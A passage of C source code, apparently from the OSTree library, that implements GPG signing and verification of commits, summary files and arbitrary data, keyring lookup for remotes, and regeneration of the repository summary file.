%s/%s", fetched_delta_parts, total_delta_parts, formatted_fetched, formatted_total); } } else if (scanning || outstanding_metadata_fetches) { g_string_append_printf (buf, "Receiving metadata objects: %u/(estimating) %s/s %s", metadata_fetched, formatted_bytes_sec, formatted_bytes_transferred); } else { g_string_append_printf (buf, "Receiving objects: %u%% (%u/%u) %s/s %s", (guint)((((double)fetched) / requested) * 100), fetched, requested, formatted_bytes_sec, formatted_bytes_transferred); } } else if (outstanding_writes) { g_string_append_printf (buf, "Writing objects: %u", outstanding_writes); } else { g_string_append_printf (buf, "Scanning metadata: %u", n_scanned_metadata); } glnx_console_text (buf->str); } /** * ostree_repo_append_gpg_signature: * @self: Self * @commit_checksum: SHA256 of given commit to sign * @signature_bytes: Signature data * @cancellable: A #GCancellable * @error: a #GError * * Append a GPG signature to a commit. */ gboolean ostree_repo_append_gpg_signature (OstreeRepo *self, const gchar *commit_checksum, GBytes *signature_bytes, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &metadata, cancellable, error)) return FALSE; #ifndef OSTREE_DISABLE_GPGME g_autoptr(GVariant) new_metadata = _ostree_detached_metadata_append_gpg_sig (metadata, signature_bytes); if (!ostree_repo_write_commit_detached_metadata (self, commit_checksum, new_metadata, cancellable, error)) return FALSE; return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } #ifndef OSTREE_DISABLE_GPGME static gboolean sign_data (OstreeRepo *self, GBytes *input_data, const gchar *key_id, const gchar *homedir, GBytes **out_signature, GCancellable *cancellable, GError **error) { g_auto(GLnxTmpfile) tmpf = { 0, }; if (!glnx_open_tmpfile_linkable_at (self->tmp_dir_fd, ".", O_RDWR | O_CLOEXEC, &tmpf, error)) return FALSE; 
g_autoptr(GOutputStream) tmp_signature_output = g_unix_output_stream_new (tmpf.fd, FALSE); g_auto(gpgme_ctx_t) context = ot_gpgme_new_ctx (homedir, error); if (!context) return FALSE; /* Get the secret keys with the given key id */ g_auto(gpgme_key_t) key = NULL; gpgme_error_t err = gpgme_get_key (context, key_id, &key, 1); if (gpgme_err_code (err) == GPG_ERR_EOF) return glnx_throw (error, "No gpg key found with ID %s (homedir: %s)", key_id, homedir ? homedir : "<default>"); else if (gpgme_err_code (err) == GPG_ERR_AMBIGUOUS_NAME) { return glnx_throw (error, "gpg key id %s ambiguous (homedir: %s). Try the fingerprint instead", key_id, homedir ? homedir : "<default>"); } else if (err != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Unable to lookup key ID %s", key_id); /* Add the key to the context as a signer */ if ((err = gpgme_signers_add (context, key)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Error signing commit"); /* Get a gpg buffer from the commit */ g_auto(gpgme_data_t) commit_buffer = NULL; gsize len; const char *buf = g_bytes_get_data (input_data, &len); if ((err = gpgme_data_new_from_mem (&commit_buffer, buf, len, FALSE)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Failed to create buffer from commit file"); /* Sign it */ g_auto(gpgme_data_t) signature_buffer = ot_gpgme_data_output (tmp_signature_output); if ((err = gpgme_op_sign (context, commit_buffer, signature_buffer, GPGME_SIG_MODE_DETACH)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Failure signing commit file"); if (!g_output_stream_close (tmp_signature_output, cancellable, error)) return FALSE; /* Return a mmap() reference */ g_autoptr(GMappedFile) signature_file = g_mapped_file_new_from_fd (tmpf.fd, FALSE, error); if (!signature_file) return FALSE; if (out_signature) *out_signature = g_mapped_file_get_bytes (signature_file); return TRUE; } #endif /* OSTREE_DISABLE_GPGME */ /** * ostree_repo_sign_commit: * @self: Self * @commit_checksum: SHA256 
of given commit to sign * @key_id: Use this GPG key id * @homedir: (allow-none): GPG home directory, or %NULL * @cancellable: A #GCancellable * @error: a #GError * * Add a GPG signature to a commit. */ gboolean ostree_repo_sign_commit (OstreeRepo *self, const gchar *commit_checksum, const gchar *key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(GBytes) commit_data = NULL; g_autoptr(GBytes) signature = NULL; g_autoptr(GVariant) commit_variant = NULL; if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, commit_checksum, &commit_variant, error)) return glnx_prefix_error (error, "Failed to read commit"); g_autoptr(GVariant) old_metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &old_metadata, cancellable, error)) return glnx_prefix_error (error, "Failed to read detached metadata"); commit_data = g_variant_get_data_as_bytes (commit_variant); /* The verify operation is merely to parse any existing signatures to * check if the commit has already been signed with the given key ID. * We want to avoid storing duplicate signatures in the metadata. We * pass the homedir so that the signing key can be imported, allowing * subkey signatures to be recognised. */ g_autoptr(GError) local_error = NULL; g_autoptr(GFile) verify_keydir = NULL; if (homedir != NULL) verify_keydir = g_file_new_for_path (homedir); g_autoptr(OstreeGpgVerifyResult) result =_ostree_repo_gpg_verify_with_metadata (self, commit_data, old_metadata, NULL, verify_keydir, NULL, cancellable, &local_error); if (!result) { /* "Not found" just means the commit is not yet signed. That's okay. 
*/ if (g_error_matches (local_error, OSTREE_GPG_ERROR, OSTREE_GPG_ERROR_NO_SIGNATURE)) { g_clear_error (&local_error); } else return g_propagate_error (error, g_steal_pointer (&local_error)), FALSE; } else if (ostree_gpg_verify_result_lookup (result, key_id, NULL)) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_EXISTS, "Commit is already signed with GPG key %s", key_id); return FALSE; } if (!sign_data (self, commit_data, key_id, homedir, &signature, cancellable, error)) return FALSE; g_autoptr(GVariant) new_metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature); if (!ostree_repo_write_commit_detached_metadata (self, commit_checksum, new_metadata, cancellable, error)) return FALSE; return TRUE; #else /* FIXME: Return false until refactoring */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_sign_delta: * @self: Self * @from_commit: From commit * @to_commit: To commit * @key_id: key id * @homedir: homedir * @cancellable: cancellable * @error: error * * This function is deprecated, sign the summary file instead. * Add a GPG signature to a static delta. */ gboolean ostree_repo_sign_delta (OstreeRepo *self, const gchar *from_commit, const gchar *to_commit, const gchar *key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_SUPPORTED, "ostree_repo_sign_delta is deprecated"); return FALSE; } /** * ostree_repo_add_gpg_signature_summary: * @self: Self * @key_id: (array zero-terminated=1) (element-type utf8): NULL-terminated array of GPG keys. * @homedir: (allow-none): GPG home directory, or %NULL * @cancellable: A #GCancellable * @error: a #GError * * Add a GPG signature to a summary file. 
*/ gboolean ostree_repo_add_gpg_signature_summary (OstreeRepo *self, const gchar **key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME glnx_autofd int fd = -1; if (!glnx_openat_rdonly (self->repo_dir_fd, "summary", TRUE, &fd, error)) return FALSE; g_autoptr(GBytes) summary_data = ot_fd_readall_or_mmap (fd, 0, error); if (!summary_data) return FALSE; /* Note that fd is reused below */ glnx_close_fd (&fd); g_autoptr(GVariant) metadata = NULL; if (!ot_openat_ignore_enoent (self->repo_dir_fd, "summary.sig", &fd, error)) return FALSE; if (fd >= 0) { if (!ot_variant_read_fd (fd, 0, G_VARIANT_TYPE (OSTREE_SUMMARY_SIG_GVARIANT_STRING), FALSE, &metadata, error)) return FALSE; } for (guint i = 0; key_id[i]; i++) { g_autoptr(GBytes) signature_data = NULL; if (!sign_data (self, summary_data, key_id[i], homedir, &signature_data, cancellable, error)) return FALSE; g_autoptr(GVariant) old_metadata = g_steal_pointer (&metadata); metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature_data); } g_autoptr(GVariant) normalized = g_variant_get_normal_form (metadata); if (!_ostree_repo_file_replace_contents (self, self->repo_dir_fd, "summary.sig", g_variant_get_data (normalized), g_variant_get_size (normalized), cancellable, error)) return FALSE; return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_gpg_sign_data: * @self: Self * @data: Data as a #GBytes * @old_signatures: Existing signatures to append to (or %NULL) * @key_id: (array zero-terminated=1) (element-type utf8): NULL-terminated array of GPG keys. * @homedir: (allow-none): GPG home directory, or %NULL * @out_signatures: (out): in case of success will contain signature * @cancellable: A #GCancellable * @error: a #GError * * Sign the given @data with the specified keys in @key_id. Similar to * ostree_repo_add_gpg_signature_summary() but can be used on any * data. 
* * You can use ostree_repo_gpg_verify_data() to verify the signatures. * * Returns: @TRUE if @data has been signed successfully, * @FALSE in case of error (@error will contain the reason). * * Since: 2020.8 */ gboolean ostree_repo_gpg_sign_data (OstreeRepo *self, GBytes *data, GBytes *old_signatures, const gchar **key_id, const gchar *homedir, GBytes **out_signatures, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(GVariant) metadata = NULL; g_autoptr(GVariant) res = NULL; if (old_signatures) metadata = g_variant_ref_sink (g_variant_new_from_bytes (G_VARIANT_TYPE (OSTREE_SUMMARY_SIG_GVARIANT_STRING), old_signatures, FALSE)); for (guint i = 0; key_id[i]; i++) { g_autoptr(GBytes) signature_data = NULL; if (!sign_data (self, data, key_id[i], homedir, &signature_data, cancellable, error)) return FALSE; g_autoptr(GVariant) old_metadata = g_steal_pointer (&metadata); metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature_data); } res = g_variant_get_normal_form (metadata); *out_signatures = g_variant_get_data_as_bytes (res); return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } #ifndef OSTREE_DISABLE_GPGME /* Special remote for _ostree_repo_gpg_verify_with_metadata() */ static const char *OSTREE_ALL_REMOTES = "__OSTREE_ALL_REMOTES__"; /* Look for a keyring for @remote in the repo itself, or in * /etc/ostree/remotes.d. 
*/ static gboolean find_keyring (OstreeRepo *self, OstreeRemote *remote, GBytes **ret_bytes, GCancellable *cancellable, GError **error) { glnx_autofd int fd = -1; if (!ot_openat_ignore_enoent (self->repo_dir_fd, remote->keyring, &fd, error)) return FALSE; if (fd != -1) { GBytes *ret = glnx_fd_readall_bytes (fd, cancellable, error); if (!ret) return FALSE; *ret_bytes = ret; return TRUE; } g_autoptr(GFile) remotes_d = get_remotes_d_dir (self, NULL); if (remotes_d) { g_autoptr(GFile) child = g_file_get_child (remotes_d, remote->keyring); if (!ot_openat_ignore_enoent (AT_FDCWD, gs_file_get_path_cached (child), &fd, error)) return FALSE; if (fd != -1) { GBytes *ret = glnx_fd_readall_bytes (fd, cancellable, error); if (!ret) return FALSE; *ret_bytes = ret; return TRUE; } } if (self->parent_repo) return find_keyring (self->parent_repo, remote, ret_bytes, cancellable, error); *ret_bytes = NULL; return TRUE; } static OstreeGpgVerifyResult * _ostree_repo_gpg_verify_data_internal (OstreeRepo *self, const gchar *remote_name, GBytes *data, GBytes *signatures, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(OstreeGpgVerifier) verifier = NULL; gboolean add_global_keyring_dir = TRUE; verifier = _ostree_gpg_verifier_new (); if (remote_name == OSTREE_ALL_REMOTES) { /* Add all available remote keyring files. */ if (!_ostree_gpg_verifier_add_keyring_dir_at (verifier, self->repo_dir_fd, ".", cancellable, error)) return NULL; } else if (remote_name != NULL) { /* Add the remote's keyring file if it exists. 
*/ g_autoptr(OstreeRemote) remote = NULL; remote = _ostree_repo_get_remote_inherited (self, remote_name, error); if (remote == NULL) return NULL; g_autoptr(GBytes) keyring_data = NULL; if (!find_keyring (self, remote, &keyring_data, cancellable, error)) return NULL; if (keyring_data != NULL) { _ostree_gpg_verifier_add_keyring_data (verifier, keyring_data, remote->keyring); add_global_keyring_dir = FALSE; } g_auto(GStrv) gpgkeypath_list = NULL; if (!ot_keyfile_get_string_list_with_separator_choice (remote->options, remote->group, "gpgkeypath", ";,", &gpgkeypath_list, error)) return NULL; if (gpgkeypath_list) { for (char **iter = gpgkeypath_list; *iter != NULL; ++iter) if (!_ostree_gpg_verifier_add_keyfile_path (verifier, *iter, cancellable, error)) return NULL; } } if (add_global_keyring_dir) { /* Use the deprecated global keyring directory. */ if (!_ostree_gpg_verifier_add_global_keyring_dir (verifier, cancellable, error)) return NULL; } if (keyringdir) { if (!_ostree_gpg_verifier_add_keyring_dir (verifier, keyringdir, cancellable, error)) return NULL; } if (extra_keyring != NULL) { _ostree_gpg_verifier_add_keyring_file (verifier, extra_keyring); } return _ostree_gpg_verifier_check_signature (verifier, data, signatures, cancellable, error); } OstreeGpgVerifyResult * _ostree_repo_gpg_verify_with_metadata (OstreeRepo *self, GBytes *signed_data, GVariant *metadata, const char *remote_name, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) signaturedata = NULL; GByteArray *buffer; GVariantIter iter; GVariant *child; g_autoptr (GBytes) signatures = NULL; if (metadata) signaturedata = g_variant_lookup_value (metadata, _OSTREE_METADATA_GPGSIGS_NAME, _OSTREE_METADATA_GPGSIGS_TYPE); if (!signaturedata) { g_set_error_literal (error, OSTREE_GPG_ERROR, OSTREE_GPG_ERROR_NO_SIGNATURE, "GPG verification enabled, but no signatures found (use gpg-verify=false in remote config to disable)"); return NULL; } /* OpenPGP data is 
organized into binary records called packets. RFC 4880 * defines a packet as a chunk of data that has a tag specifying its meaning, * and consists of a packet header followed by a packet body. Each packet * encodes its own length, and so packets can be concatenated to construct * OpenPGP messages, keyrings, or in this case, detached signatures. * * Each binary blob in the GVariant list is a complete signature packet, so * we can concatenate them together to verify all the signatures at once. */ buffer = g_byte_array_new (); g_variant_iter_init (&iter, signaturedata); while ((child = g_variant_iter_next_value (&iter)) != NULL) { g_byte_array_append (buffer, g_variant_get_data (child), g_variant_get_size (child)); g_variant_unref (child); } signatures = g_byte_array_free_to_bytes (buffer); return _ostree_repo_gpg_verify_data_internal (self, remote_name, signed_data, signatures, keyringdir, extra_keyring, cancellable, error); } /* Needed an internal version for the remote_name parameter. */ OstreeGpgVerifyResult * _ostree_repo_verify_commit_internal (OstreeRepo *self, const char *commit_checksum, const char *remote_name, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) commit_variant = NULL; /* Load the commit */ if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, commit_checksum, &commit_variant, error)) return glnx_prefix_error_null (error, "Failed to read commit"); /* Load the metadata */ g_autoptr(GVariant) metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &metadata, cancellable, error)) return glnx_prefix_error_null (error, "Failed to read detached metadata"); g_autoptr(GBytes) signed_data = g_variant_get_data_as_bytes (commit_variant); /* XXX This is a hackish way to indicate to use ALL remote-specific * keyrings in the signature verification. We want this when * verifying a signed commit that's already been pulled. 
*/ if (remote_name == NULL) remote_name = OSTREE_ALL_REMOTES; return _ostree_repo_gpg_verify_with_metadata (self, signed_data, metadata, remote_name, keyringdir, extra_keyring, cancellable, error); } #endif /* OSTREE_DISABLE_GPGME */ /** * ostree_repo_verify_commit: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @keyringdir: (allow-none): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (allow-none): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Check for a valid GPG signature on commit named by the ASCII * checksum @commit_checksum. * * Returns: %TRUE if there was a GPG signature from a trusted keyring, otherwise %FALSE */ gboolean ostree_repo_verify_commit (OstreeRepo *self, const gchar *commit_checksum, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(OstreeGpgVerifyResult) result = NULL; result = ostree_repo_verify_commit_ext (self, commit_checksum, keyringdir, extra_keyring, cancellable, error); if (!ostree_gpg_verify_result_require_valid_signature (result, error)) return glnx_prefix_error (error, "Commit %s", commit_checksum); return TRUE; #else /* FIXME: Return false until refactoring */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_commit_ext: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @keyringdir: (allow-none): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (allow-none): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Read GPG signature(s) on the commit named by the ASCII checksum * @commit_checksum and return detailed results. 
* * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error */ OstreeGpgVerifyResult * ostree_repo_verify_commit_ext (OstreeRepo *self, const gchar *commit_checksum, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_verify_commit_internal (self, commit_checksum, NULL, keyringdir, extra_keyring, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_commit_for_remote: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @remote_name: OSTree remote to use for configuration * @cancellable: Cancellable * @error: Error * * Read GPG signature(s) on the commit named by the ASCII checksum * @commit_checksum and return detailed results, based on the keyring * configured for @remote. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error * * Since: 2016.14 */ OstreeGpgVerifyResult * ostree_repo_verify_commit_for_remote (OstreeRepo *self, const gchar *commit_checksum, const gchar *remote_name, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_verify_commit_internal (self, commit_checksum, remote_name, NULL, NULL, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_gpg_verify_data: * @self: Repository * @remote_name: (nullable): Name of remote * @data: Data as a #GBytes * @signatures: Signatures as a #GBytes * @keyringdir: (nullable): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (nullable): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Verify @signatures for @data using GPG keys in the keyring for * @remote_name, and return an #OstreeGpgVerifyResult. * * The @remote_name parameter can be %NULL. 
In that case it will do * the verifications using GPG keys in the keyrings of all remotes. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error * * Since: 2016.6 */ OstreeGpgVerifyResult * ostree_repo_gpg_verify_data (OstreeRepo *self, const gchar *remote_name, GBytes *data, GBytes *signatures, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); g_return_val_if_fail (data != NULL, NULL); g_return_val_if_fail (signatures != NULL, NULL); #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_gpg_verify_data_internal (self, (remote_name != NULL) ? remote_name : OSTREE_ALL_REMOTES, data, signatures, keyringdir, extra_keyring, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_summary: * @self: Repo * @remote_name: Name of remote * @summary: Summary data as a #GBytes * @signatures: Summary signatures as a #GBytes * @cancellable: Cancellable * @error: Error * * Verify @signatures for @summary data using GPG keys in the keyring for * @remote_name, and return an #OstreeGpgVerifyResult. 
* * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error */ OstreeGpgVerifyResult * ostree_repo_verify_summary (OstreeRepo *self, const char *remote_name, GBytes *summary, GBytes *signatures, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) signatures_variant = NULL; g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); g_return_val_if_fail (remote_name != NULL, NULL); g_return_val_if_fail (summary != NULL, NULL); g_return_val_if_fail (signatures != NULL, NULL); signatures_variant = g_variant_new_from_bytes (OSTREE_SUMMARY_SIG_GVARIANT_FORMAT, signatures, FALSE); #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_gpg_verify_with_metadata (self, summary, signatures_variant, remote_name, NULL, NULL, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /* Add an entry for a @ref ↦ @checksum mapping to an `a(s(t@ay@a{sv}))` * @refs_builder to go into a `summary` file. This includes building the * standard additional metadata keys for the ref. */ static gboolean summary_add_ref_entry (OstreeRepo *self, const char *ref, const char *checksum, GVariantBuilder *refs_builder, GError **error) { g_auto(GVariantDict) commit_metadata_builder = OT_VARIANT_BUILDER_INITIALIZER; g_assert (ref); g_assert (checksum); g_autofree char *remotename = NULL; if (!ostree_parse_refspec (ref, &remotename, NULL, NULL)) g_assert_not_reached (); /* Don't put remote refs in the summary */ if (remotename != NULL) return TRUE; g_autoptr(GVariant) commit_obj = NULL; if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, checksum, &commit_obj, error)) return FALSE; g_variant_dict_init (&commit_metadata_builder, NULL); /* Forward the commit’s timestamp if it’s valid. 
*/ guint64 commit_timestamp = ostree_commit_get_timestamp (commit_obj); g_autoptr(GDateTime) dt = g_date_time_new_from_unix_utc (commit_timestamp); if (dt != NULL) g_variant_dict_insert_value (&commit_metadata_builder, OSTREE_COMMIT_TIMESTAMP, g_variant_new_uint64 (GUINT64_TO_BE (commit_timestamp))); g_variant_builder_add_value (refs_builder, g_variant_new ("(s(t@ay@a{sv}))", ref, (guint64) g_variant_get_size (commit_obj), ostree_checksum_to_bytes_v (checksum), g_variant_dict_end (&commit_metadata_builder))); return TRUE; } /** * ostree_repo_regenerate_summary: * @self: Repo * @additional_metadata: (allow-none): A GVariant of type a{sv}, or %NULL * @cancellable: Cancellable * @error: Error * * An OSTree repository can contain a high level "summary" file that * describes the available branches and other metadata. * * If the timetable for making commits and updating the summary file is fairly * regular, setting the `ostree.summary.expires` key in @additional_metadata * will aid clients in working out when to check for updates. * * It is regenerated automatically after any ref is * added, removed, or updated if `core/auto-update-summary` is set. * * If the `core/collection-id` key is set in the configuration, it will be * included as %OSTREE_SUMMARY_COLLECTION_ID in the summary file. Refs that * have associated collection IDs will be included in the generated summary * file, listed under the %OSTREE_SUMMARY_COLLECTION_MAP key. Collection IDs * and refs in %OSTREE_SUMMARY_COLLECTION_MAP are guaranteed to be in * lexicographic order. * * Locking: exclusive */ gboolean ostree_repo_regenerate_summary (OstreeRepo *self, GVariant *additional_metadata, GCancellable *cancellable, GError **error) { /* Take an exclusive lock. This makes sure the commits and deltas don't get * deleted while generating the summary. 
It also means we can be sure refs * won't be created/updated/deleted during the operation, without having to * add exclusive locks to those operations which would prevent concurrent * commits from working. */ g_autoptr(OstreeRepoAutoLock) lock = NULL; gboolean no_deltas_in_summary = FALSE; lock = _ostree_repo_auto_lock_push (self, OSTREE_REPO_LOCK_EXCLUSIVE, cancellable, error); if (!lock) return FALSE; g_auto(GVariantDict) additional_metadata_builder = OT_VARIANT_BUILDER_INITIALIZER; g_variant_dict_init (&additional_metadata_builder, additional_metadata); g_autoptr(GVariantBuilder) refs_builder = g_variant_builder_new (G_VARIANT_TYPE ("a(s(taya{sv}))")); const gchar *main_collection_id = ostree_repo_get_collection_id (self); { if (main_collection_id == NULL) { g_autoptr(GHashTable) refs = NULL; if (!ostree_repo_list_refs (self, NULL, &refs, cancellable, error)) return FALSE; g_autoptr(GList) ordered_keys = g_hash_table_get_keys (refs); ordered_keys = g_list_sort (ordered_keys, (GCompareFunc)strcmp); for (GList *iter = ordered_keys; iter; iter = iter->next) { const char *ref = iter->data; const char *commit = g_hash_table_lookup (refs, ref); if (!summary_add_ref_entry (self, ref, commit, refs_builder, error)) return FALSE; } } } if (!ot_keyfile_get_boolean_with_default (self->config, "core", "no-deltas-in-summary", FALSE, &no_deltas_in_summary, error)) return FALSE; if (!no_deltas_in_summary) { g_autoptr(GPtrArray) delta_names = NULL; g_auto(GVariantDict) deltas_builder = OT_VARIANT_BUILDER_INITIALIZER; if (!ostree_repo_list_static_delta_names (self, &delta_names, cancellable, error)) return FALSE; g_variant_dict_init (&deltas_builder, NULL); for (guint i = 0; i < delta_names->len; i++) { g_autofree char *from = NULL; g_autofree char *to = NULL; GVariant *digest; if (!_ostree_parse_delta_name (delta_names->pdata[i], &from, &to, error)) return FALSE; digest = _ostree_repo_static_delta_superblock_digest (self, (from && from[0]) ? 
from : NULL, to, cancellable, error); if (digest == NULL) return FALSE; g_variant_dict_insert_value (&deltas_builder, delta_names->pdata[i], digest); } if (delta_names->len > 0) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_STATIC_DELTAS, g_variant_dict_end (&deltas_builder)); } { g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_LAST_MODIFIED, g_variant_new_uint64 (GUINT64_TO_BE (g_get_real_time () / G_USEC_PER_SEC))); } { g_autofree char *remote_mode_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "mode", "bare", &remote_mode_str, error)) return FALSE; g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_MODE, g_variant_new_string (remote_mode_str)); } { gboolean tombstone_commits = FALSE; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "tombstone-commits", FALSE, &tombstone_commits, error)) return FALSE; g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_TOMBSTONE_COMMITS, g_variant_new_boolean (tombstone_commits)); } g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_INDEXED_DELTAS, g_variant_new_boolean (TRUE)); /* Add refs which have a collection specified, which could be in refs/mirrors, * refs/heads, and/or refs/remotes. 
*/ { g_autoptr(GHashTable) collection_refs = NULL; if (!ostree_repo_list_collection_refs (self, NULL, &collection_refs, OSTREE_REPO_LIST_REFS_EXT_NONE, cancellable, error)) return FALSE; gsize collection_map_size = 0; GHashTableIter iter; g_autoptr(GHashTable) collection_map = NULL; /* (element-type utf8 GHashTable) */ g_hash_table_iter_init (&iter, collection_refs); collection_map = g_hash_table_new_full (g_str_hash, g_str_equal, NULL, (GDestroyNotify) g_hash_table_unref); const OstreeCollectionRef *c_ref; const char *checksum; while (g_hash_table_iter_next (&iter, (gpointer *) &c_ref, (gpointer *) &checksum)) { GHashTable *ref_map = g_hash_table_lookup (collection_map, c_ref->collection_id); if (ref_map == NULL) { ref_map = g_hash_table_new_full (g_str_hash, g_str_equal, NULL, NULL); g_hash_table_insert (collection_map, c_ref->collection_id, ref_map); } g_hash_table_insert (ref_map, c_ref->ref_name, (gpointer) checksum); } g_autoptr(GVariantBuilder) collection_refs_builder = g_variant_builder_new (G_VARIANT_TYPE ("a{sa(s(taya{sv}))}")); g_autoptr(GList) ordered_collection_ids = g_hash_table_get_keys (collection_map); ordered_collection_ids = g_list_sort (ordered_collection_ids, (GCompareFunc) strcmp); for (GList *collection_iter = ordered_collection_ids; collection_iter; collection_iter = collection_iter->next) { const char *collection_id = collection_iter->data; GHashTable *ref_map = g_hash_table_lookup (collection_map, collection_id); /* We put the local repo's collection ID in the main refs map, rather * than the collection map, for backwards compatibility. 
*/ gboolean is_main_collection_id = (main_collection_id != NULL && g_str_equal (collection_id, main_collection_id)); if (!is_main_collection_id) { g_variant_builder_open (collection_refs_builder, G_VARIANT_TYPE ("{sa(s(taya{sv}))}")); g_variant_builder_add (collection_refs_builder, "s", collection_id); g_variant_builder_open (collection_refs_builder, G_VARIANT_TYPE ("a(s(taya{sv}))")); } g_autoptr(GList) ordered_refs = g_hash_table_get_keys (ref_map); ordered_refs = g_list_sort (ordered_refs, (GCompareFunc) strcmp); for (GList *ref_iter = ordered_refs; ref_iter != NULL; ref_iter = ref_iter->next) { const char *ref = ref_iter->data; const char *commit = g_hash_table_lookup (ref_map, ref); GVariantBuilder *builder = is_main_collection_id ? refs_builder : collection_refs_builder; if (!summary_add_ref_entry (self, ref, commit, builder, error)) return FALSE; if (!is_main_collection_id) collection_map_size++; } if (!is_main_collection_id) { g_variant_builder_close (collection_refs_builder); /* array */ g_variant_builder_close (collection_refs_builder); /* dict entry */ } } if (main_collection_id != NULL) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_COLLECTION_ID, g_variant_new_string (main_collection_id)); if (collection_map_size > 0) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_COLLECTION_MAP, g_variant_builder_end (collection_refs_builder)); } g_autoptr(GVariant) summary = NULL; { g_autoptr(GVariantBuilder) summary_builder = g_variant_builder_new (OSTREE_SUMMARY_GVARIANT_FORMAT); g_variant_builder_add_value (summary_builder, g_variant_builder_end (refs_builder)); g_variant_builder_add_value (summary_builder, g_variant_dict_end (&additional_metadata_builder)); summary = g_variant_builder_end (summary_builder); g_variant_ref_sink (summary); } if (!ostree_repo_static_delta_reindex (self, 0, NULL, cancellable, error)) return FALSE; if (!_ostree_repo_file_replace_contents (self, self->repo_dir_fd, "summary", 
